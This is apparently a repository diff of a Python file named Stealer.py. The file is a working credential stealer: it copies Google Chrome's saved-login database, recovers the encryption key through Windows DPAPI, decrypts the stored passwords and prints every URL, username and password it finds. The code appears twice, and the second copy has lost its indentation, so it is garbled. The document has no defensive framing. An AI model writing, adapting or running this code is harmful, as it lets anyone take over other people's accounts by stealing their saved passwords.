SecFathy · March 18, 2025 18:37
diff --git a/Stealer.py b/Stealer.py
 import os
 import sqlite3
 import json
 import base64
 import shutil
 import win32crypt
 from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
 from cryptography.hazmat.backends import default_backend

 CHROME_PATH = os.path.expanduser("~") + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
 LOCAL_STATE_PATH = os.path.expanduser("~") + r"\AppData\Local\Google\Chrome\User Data\Local State"

 def get_encryption_key():
    try:
        with open(LOCAL_STATE_PATH, "r", encoding="utf-8") as f:
            local_state = json.load(f)
        encrypted_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
        encrypted_key = encrypted_key[5:]
        return win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
    except Exception:
        return None

 def decrypt_password(encrypted_password, key):
    try:
        if encrypted_password[:3] == b'v10':
            iv = encrypted_password[3:15]
            payload = encrypted_password[15:-16]
            auth_tag = encrypted_password[-16:]
            cipher = Cipher(algorithms.AES(key), modes.GCM(iv, auth_tag), backend=default_backend())
            decryptor = cipher.decryptor()
            decrypted_password = decryptor.update(payload) + decryptor.finalize()
            return decrypted_password.decode("utf-8", errors="ignore")
        else:
            return win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
    except Exception:
        return None

 def get_chrome_passwords():
    if not os.path.exists(CHROME_PATH):
        return

    temp_db_path = "LoginData_temp"
    try:
        shutil.copy2(CHROME_PATH, temp_db_path)
    except Exception:
        return

    conn = sqlite3.connect(temp_db_path)
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        key = get_encryption_key()

        if key is None:
            return

        for url, username, encrypted_password in cursor.fetchall():
            if encrypted_password:
                password = decrypt_password(encrypted_password, key)
                if password:
                    print(f"URL: {url}\nUsername: {username}\nPassword: {password}\n")
    except sqlite3.Error:
        pass
    finally:
        conn.close()
        if os.path.exists(temp_db_path):
            os.remove(temp_db_path)

 if __name__ == "__main__":
    get_chrome_passwords()
	import os
	import sqlite3
	import json
	import base64
	import shutil
	import win32crypt
	from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
	from cryptography.hazmat.backends import default_backend

	CHROME_PATH = os.path.expanduser("~") + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
	LOCAL_STATE_PATH = os.path.expanduser("~") + r"\AppData\Local\Google\Chrome\User Data\Local State"

	def get_encryption_key():
	try:
	with open(LOCAL_STATE_PATH, "r", encoding="utf-8") as f:
	local_state = json.load(f)
	encrypted_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
	encrypted_key = encrypted_key[5:]
	return win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
	except Exception:
	return None

	def decrypt_password(encrypted_password, key):
	try:
	if encrypted_password[:3] == b'v10':
	iv = encrypted_password[3:15]
	payload = encrypted_password[15:-16]
	auth_tag = encrypted_password[-16:]
	cipher = Cipher(algorithms.AES(key), modes.GCM(iv, auth_tag), backend=default_backend())
	decryptor = cipher.decryptor()
	decrypted_password = decryptor.update(payload) + decryptor.finalize()
	return decrypted_password.decode("utf-8", errors="ignore")
	else:
	return win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
	except Exception:
	return None

	def get_chrome_passwords():
	if not os.path.exists(CHROME_PATH):
	return

	temp_db_path = "LoginData_temp"
	try:
	shutil.copy2(CHROME_PATH, temp_db_path)
	except Exception:
	return

	conn = sqlite3.connect(temp_db_path)
	cursor = conn.cursor()

	try:
	cursor.execute("SELECT action_url, username_value, password_value FROM logins")
	key = get_encryption_key()

	if key is None:
	return

	for url, username, encrypted_password in cursor.fetchall():
	if encrypted_password:
	password = decrypt_password(encrypted_password, key)
	if password:
	print(f"URL: {url}\nUsername: {username}\nPassword: {password}\n")
	except sqlite3.Error:
	pass
	finally:
	conn.close()
	if os.path.exists(temp_db_path):
	os.remove(temp_db_path)

	if __name__ == "__main__":
	get_chrome_passwords()